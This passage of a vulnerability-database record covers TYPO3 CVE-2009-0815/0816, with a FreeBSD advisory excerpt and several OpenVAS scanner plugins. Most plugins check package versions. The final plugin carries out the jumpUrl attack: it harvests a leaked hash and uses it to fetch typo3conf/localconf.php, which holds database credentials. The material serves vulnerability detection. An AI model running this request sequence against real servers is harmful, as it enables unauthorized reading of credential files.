This can\n\t be exploited to execute arbitrary HTML and script code in a user's\n\t browser session in context of an affected site.\nAn error in the \"jumpUrl\" mechanism can be exploited to read\n\t arbitrary files from local resources by disclosing a hash secret used\n\t to restrict file access.\n\n", "modified": "2010-05-02T00:00:00", "published": "2009-02-10T00:00:00", "id": "CC47FAFE-F823-11DD-94D9-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/cc47fafe-f823-11dd-94d9-0030843d3802.html", "title": "typo3 -- cross-site scripting and information disclosure", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2017-07-24T12:56:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update to typo3-src\nannounced via advisory DSA 1720-1.", "modified": "2017-07-07T00:00:00", "published": "2009-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63393", "id": "OPENVAS:63393", "title": "Debian Security Advisory DSA 1720-1 (typo3-src)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1720_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1720-1 (typo3-src)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in the TYPO3 web\ncontent management framework.\n\nMarcus Krause and Michael Stucki from the TYPO3 security team\ndiscovered that the jumpUrl mechanism discloses secret hashes enabling\na remote attacker to bypass access control by submitting the correct\nvalue as a URL parameter and thus being able to read the content of\narbitrary files.\n\nJelmer de Hen and Dmitry Dulepov discovered multiple cross-site\nscripting vulnerabilities in the backend user interface allowing\nremote attackers to inject arbitrary web script or HTML.\n\nAs it is very likely that your encryption key has been exposed we\nstrongly recommend to change your encyption key via the install tool\nafter installing the update.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 4.0.2+debian-8.\n\nFor the testing distribution (lenny) these problems have been fixed in\nversion 4.2.5-1+lenny1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.2.6-1.\n\nWe recommend that you upgrade your typo3 package.\";\ntag_summary = \"The remote host is missing an update to typo3-src\nannounced via advisory DSA 1720-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201720-1\";\n\n\nif(description)\n{\n script_id(63393);\n script_cve_id(\"CVE-2009-0815\",\"CVE-2009-0816\");\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_tag(name:\"cvss_base\", 
value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Debian Security Advisory DSA 1720-1 (typo3-src)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"typo3-src-4.0\", ver:\"4.0.2+debian-8\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"typo3\", ver:\"4.0.2+debian-8\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:52", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-28T00:00:00", "published": "2009-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63356", "id": "OPENVAS:63356", "title": "FreeBSD Ports: typo3", "type": "openvas", "sourceData": "#\n#VID cc47fafe-f823-11dd-94d9-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID cc47fafe-f823-11dd-94d9-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: typo3\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/33829/\nhttp://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/\nhttp://www.vuxml.org/freebsd/cc47fafe-f823-11dd-94d9-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(63356);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_name(\"FreeBSD Ports: typo3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"typo3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.2.6\")<0) {\n txt += 'Package typo3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:37:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063356", "id": "OPENVAS:136141256231063356", "title": "FreeBSD Ports: typo3", "type": "openvas", "sourceData": "#\n#VID cc47fafe-f823-11dd-94d9-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID cc47fafe-f823-11dd-94d9-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: typo3\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/33829/\nhttp://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/\nhttp://www.vuxml.org/freebsd/cc47fafe-f823-11dd-94d9-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63356\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_name(\"FreeBSD Ports: typo3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"typo3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.2.6\")<0) {\n txt += 'Package typo3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:39:07", "bulletinFamily": "scanner", "description": "The remote host is missing an update to typo3-src\nannounced via advisory DSA 1720-1.", "modified": "2018-04-06T00:00:00", "published": "2009-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063393", "id": "OPENVAS:136141256231063393", "type": "openvas", "title": "Debian Security Advisory DSA 1720-1 (typo3-src)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1720_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1720-1 (typo3-src)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in the TYPO3 web\ncontent management framework.\n\nMarcus Krause and Michael Stucki from the TYPO3 security team\ndiscovered that the jumpUrl mechanism discloses secret hashes enabling\na remote attacker to bypass access control by submitting the correct\nvalue as a URL parameter and thus being able to read the content of\narbitrary files.\n\nJelmer de Hen and Dmitry Dulepov discovered multiple cross-site\nscripting vulnerabilities in the backend user interface allowing\nremote attackers to inject arbitrary web script or HTML.\n\nAs it is very likely that your encryption key has been exposed we\nstrongly recommend to change your encryption key via the install tool\nafter installing the update.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 4.0.2+debian-8.\n\nFor the testing distribution (lenny) these problems have been fixed in\nversion 4.2.5-1+lenny1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.2.6-1.\n\nWe recommend that you upgrade your 
typo3 package.\";\ntag_summary = \"The remote host is missing an update to typo3-src\nannounced via advisory DSA 1720-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201720-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63393\");\n script_cve_id(\"CVE-2009-0815\",\"CVE-2009-0816\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-13 20:43:17 +0100 (Fri, 13 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Debian Security Advisory DSA 1720-1 (typo3-src)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"typo3-src-4.0\", ver:\"4.0.2+debian-8\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"typo3\", ver:\"4.0.2+debian-8\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:37:15", "bulletinFamily": "scanner", 
"description": "This host is installed with TYPO3 and is prone to multiple vulnerabilities.", "modified": "2019-03-12T00:00:00", "published": "2013-12-26T00:00:00", "id": "OPENVAS:1361412562310803989", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803989", "title": "TYPO3 jumpUrl File Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_typo3_jumpurl_file_disclosure_vuln.nasl 14117 2019-03-12 14:02:42Z cfischer $\n#\n# TYPO3 jumpUrl File Disclosure Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:typo3:typo3\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803989\");\n script_version(\"$Revision: 14117 $\");\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_bugtraq_id(33714);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 15:02:42 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-12-26 17:48:31 +0530 (Thu, 26 Dec 2013)\");\n script_name(\"TYPO3 jumpUrl File Disclosure Vulnerability\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to steal the\n victim's cookie-based authentication credentials or access arbitrary files.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request and check whether it is able to fetch a\n remote file.\");\n\n script_tag(name:\"insight\", value:\"Multiple errors exist in the application:\n\n - An error exists in the jumpUrl mechanism, which will disclose a hash secret.\n\n - An error exists in the backend user interface, which fails to validate user\n supplied input properly.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to TYPO3 version 4.0.12, 4.1.10, 4.2.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"This host is installed with TYPO3 and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"affected\", value:\"TYPO3 versions 3.3.x, 3.5.x, 3.6.x, 3.7.x, 3.8.x, 4.0 to 4.0.11,\n 4.1.0 to 4.1.9, 4.2.0 to 4.2.5, 
4.3alpha1\");\n\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1021710\");\n script_xref(name:\"URL\", value:\"http://typo3.org/teams/security/security-bulletins/typo3-core/TYPO3-SA-2009-002/\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_typo3_detect.nasl\");\n script_mandatory_keys(\"TYPO3/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"url_func.inc\");\ninclude(\"http_func.inc\");\n\ninclude(\"host_details.inc\");\n\nif(!typoPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(typoLoca = get_app_location(cpe:CPE, port:typoPort))\n{\n url = \"/?jumpurl=\" + urlencode(str:\"typo3conf/localconf.php\")+\n \"&type=0&juSecure=1&locationData=\"+ urlencode(str:\"2:\");\n\n sndReq = http_get(item:string(typoLoca, url), port:typoPort);\n rcvRes = http_send_recv(port:typoPort, data:sndReq);\n\n hash = eregmatch(pattern:\"jumpurl Secure: Calculated juHash, ([a-z0-9]+), did not match\" , string:rcvRes);\n\n if(hash[1])\n {\n hashURL = url + \"&juHash=\" + hash[1];\n\n sndReq = http_get(item:string(typoLoca, hashURL), port:typoPort);\n rcvRes = http_send_recv(port:typoPort, data:sndReq);\n\n if(rcvRes && rcvRes =~ \"HTTP/1.. 200\" && \"$typo_db\" >< rcvRes &&\n \"$typo_db_username\" >< rcvRes)\n {\n security_message(typoPort);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}